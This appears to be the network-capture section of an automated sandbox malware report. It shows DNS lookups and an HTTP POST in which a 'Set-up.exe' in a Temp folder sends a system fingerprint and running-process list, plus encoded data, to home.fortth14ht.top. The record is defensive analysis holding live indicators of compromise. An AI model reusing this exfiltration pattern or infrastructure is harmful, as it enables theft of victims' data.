Dec 27, 2024 08:53:20.680120945 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.680212021 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.680222034 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.680268049 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.680308104 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.680434942 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.680444002 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.680553913 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.680563927 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.680623055 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.680640936 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.680773020 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.680783033 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.680846930 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.680871010 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.680907011 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.680946112 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.681021929 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.681046963 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.681088924 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.699533939 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.699549913 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.743407011 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.796382904 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.796433926 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.796565056 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.796575069 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.796585083 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.796885014 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.796993017 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.798245907 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.798361063 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.798377991 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.798513889 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.798527956 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.798681021 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.798690081 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.798706055 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.798778057 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.798923016 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.798948050 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.799134970 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.799209118 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.799346924 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.799364090 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.799560070 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.799606085 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.799792051 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.799851894 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.799983025 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.800007105 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.800106049 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.800153971 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.800270081 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.800316095 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.800434113 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.800481081 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.800558090 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.800569057 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.800611019 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.800648928 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.800764084 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.800774097 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.800853968 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.800864935 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.800942898 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.800959110 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.801065922 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.801076889 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.801177979 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.801213980 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.801289082 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.801307917 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.801415920 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.801433086 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.801542997 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.801691055 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.801701069 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.801752090 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.801875114 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.801882982 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.802000046 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.802026987 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.802114964 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.802352905 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.802436113 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.916671038 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.916686058 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.916709900 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.916721106 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.916791916 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.916848898 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.916860104 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.916932106 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.917037010 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.917084932 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.917184114 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.917253017 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.917330027 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.917414904 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.917520046 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.917607069 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.917642117 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.917696953 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.917817116 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.917825937 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.917941093 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.918032885 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.918174982 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.918200970 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.918287039 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.918322086 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.918412924 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.918448925 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.918534994 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.918543100 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.918642044 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.918713093 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.918798923 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.918808937 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.918863058 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.918962955 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.919004917 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.919013977 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.919070959 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.919095993 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.919234991 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.919245958 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.919373989 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.919383049 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.919459105 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.919514894 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.919634104 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.919689894 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.919738054 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.919747114 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.919835091 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.919858932 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.919948101 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.920054913 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.920285940 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.921972036 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.922017097 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.922103882 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.922188997 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.922249079 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.922274113 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.922400951 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.922454119 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.922547102 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.922604084 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.922705889 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.922714949 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.922820091 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.922872066 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.922880888 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.922946930 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.923018932 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.923078060 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.923229933 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.923239946 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.923347950 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.923439026 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.923474073 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.923558950 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.923619986 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.923639059 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.923729897 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.923755884 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.923825026 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.923866034 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.923947096 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.923957109 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.924032927 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.924043894 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.924129009 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.924139023 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.924235106 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.924246073 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.924355030 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.924386978 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.924459934 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.924469948 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.924562931 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.924573898 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.924649954 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.924660921 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.924755096 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.924782991 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.924865961 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.924974918 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.924983978 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.924993992 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.925040007 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.925065994 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:21.039977074 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:21.039998055 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:21.040034056 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:21.040051937 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:21.040134907 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:21.040143967 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:21.040239096 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:21.040249109 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:21.040323019 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:21.040330887 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:21.040443897 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:21.040473938 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:21.040482998 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:23.241959095 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:23.241976976 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:23.242037058 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:23.242229939 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:23.361685991 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:23.393573046 CET	49710	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:23.513792038 CET	80	49710	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:23.513914108 CET	49710	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:23.514213085 CET	49710	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:23.634246111 CET	80	49710	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:25.046108007 CET	80	49710	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:25.046128035 CET	80	49710	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:25.046217918 CET	49710	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:25.120903969 CET	49710	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:25.241209030 CET	80	49710	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:25.271918058 CET	49711	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:25.391630888 CET	80	49711	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:25.391773939 CET	49711	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:25.392018080 CET	49711	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:25.511495113 CET	80	49711	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:26.915072918 CET	80	49711	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:26.915293932 CET	80	49711	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:26.915390968 CET	49711	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:26.915575981 CET	49711	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:27.035222054 CET	80	49711	185.121.15.192	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 08:53:06.732620955 CET	53320	53	192.168.2.8	1.1.1.1
Dec 27, 2024 08:53:06.732680082 CET	53320	53	192.168.2.8	1.1.1.1
Dec 27, 2024 08:53:06.870595932 CET	53	53320	1.1.1.1	192.168.2.8
Dec 27, 2024 08:53:06.870713949 CET	53	53320	1.1.1.1	192.168.2.8
Dec 27, 2024 08:53:19.154763937 CET	53323	53	192.168.2.8	1.1.1.1
Dec 27, 2024 08:53:19.154995918 CET	53323	53	192.168.2.8	1.1.1.1
Dec 27, 2024 08:53:19.292892933 CET	53	53323	1.1.1.1	192.168.2.8
Dec 27, 2024 08:53:19.292911053 CET	53	53323	1.1.1.1	192.168.2.8
Dec 27, 2024 08:53:23.254002094 CET	60775	53	192.168.2.8	1.1.1.1
Dec 27, 2024 08:53:23.254045010 CET	60775	53	192.168.2.8	1.1.1.1
Dec 27, 2024 08:53:23.392832041 CET	53	60775	1.1.1.1	192.168.2.8
Dec 27, 2024 08:53:23.392848015 CET	53	60775	1.1.1.1	192.168.2.8
Dec 27, 2024 08:53:25.126955986 CET	53276	53	192.168.2.8	1.1.1.1
Dec 27, 2024 08:53:25.127008915 CET	53276	53	192.168.2.8	1.1.1.1
Dec 27, 2024 08:53:25.264727116 CET	53	53276	1.1.1.1	192.168.2.8
Dec 27, 2024 08:53:25.264864922 CET	53	53276	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 08:53:06.732620955 CET	192.168.2.8	1.1.1.1	0x3b10	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:53:06.732680082 CET	192.168.2.8	1.1.1.1	0xfc26	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 27, 2024 08:53:19.154763937 CET	192.168.2.8	1.1.1.1	0xe51b	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:53:19.154995918 CET	192.168.2.8	1.1.1.1	0xf94e	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 27, 2024 08:53:23.254002094 CET	192.168.2.8	1.1.1.1	0x956	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:53:23.254045010 CET	192.168.2.8	1.1.1.1	0xbc7f	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 27, 2024 08:53:25.126955986 CET	192.168.2.8	1.1.1.1	0x339b	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:53:25.127008915 CET	192.168.2.8	1.1.1.1	0xbe07	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 08:53:06.870713949 CET	1.1.1.1	192.168.2.8	0x3b10	No error (0)	httpbin.org	3.218.7.103	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:53:06.870713949 CET	1.1.1.1	192.168.2.8	0x3b10	No error (0)	httpbin.org	34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:53:19.292911053 CET	1.1.1.1	192.168.2.8	0xe51b	No error (0)	home.fortth14ht.top	185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:53:23.392832041 CET	1.1.1.1	192.168.2.8	0x956	No error (0)	home.fortth14ht.top	185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:53:25.264727116 CET	1.1.1.1	192.168.2.8	0x339b	No error (0)	home.fortth14ht.top	185.121.15.192	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

home.fortth14ht.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49706	185.121.15.192	80	6108	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 08:53:19.416158915 CET	12360	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 473466 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 32 38 39 37 34 38 30 38 36 34 33 31 36 35 34 31 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8528974808643165411", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 744 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe" [TRUNCATED]
Dec 27, 2024 08:53:19.536041975 CET	17304	OUT	Data Raw: 71 77 2b 4b 64 4f 4d 50 65 50 79 44 78 65 2b 6a 4c 34 33 2b 41 32 58 35 50 6d 76 69 76 77 54 5c 2f 71 72 67 4d 2b 78 74 66 4c 73 70 78 48 2b 73 6e 43 4f 65 66 57 38 5a 68 71 43 78 4e 65 6a 37 50 68 76 50 73 34 72 55 4f 53 68 4a 54 35 38 54 54 6f Data Ascii: qw+KdOMPePyDxe+jL43+A2X5PmvivwT\/qrgM+xtfLspxH+snCOefW8ZhqCxNej7PhvPs4rUOShJT58TTo0pfDCcppxODop7LjkdP5Uyv6IPwcKKKKDSn1+X6kLx8h\/f\/P6\/wCfRtWK\/UX\/AIJTf8E9\/wBn79sHwh8aPjR+0homq\/EW28OfF7WPhD4N8Fp4q8WeFNG0K38L+HvDWv6jrck\/g7WtA1S8u9UXxZp1tDA2
Dec 27, 2024 08:53:19.536103964 CET	2472	OUT	Data Raw: 6b 4d 65 39 74 67 64 5c 2f 39 56 5c 2f 2b 76 5c 2f 50 76 54 47 6b 54 35 33 64 4c 66 66 32 38 7a 6d 43 71 41 5a 35 6a 79 48 66 73 74 5c 2f 33 66 35 7a 66 35 37 6a 33 39 71 66 4a 76 6b 33 76 5c 2f 41 4b 6e 79 6f 76 4e 5c 2f 34 2b 76 50 38 37 31 75 Data Ascii: kMe9tgd\/9V\/+v\/PvTGkT53dLff28zmCqAZ5jyHfst\/3f5zf57j39qfJvk3v\/AKnyovN\/4+vP871uvf8A\/VUMi7pNm\/enMsX7o\/zp\/mfcH3+fK94bfH\/Hr\/14\/wA+Otc50BH\/AKzztm95P+Xfyv3HFr\/n6Ufudqbzzcf8s+fI\/n\/nvxULSFY0fZ\/n06fh39O9Hlp86\/cj\/wBV5fp0\/wD1\/wCNBp7Ty
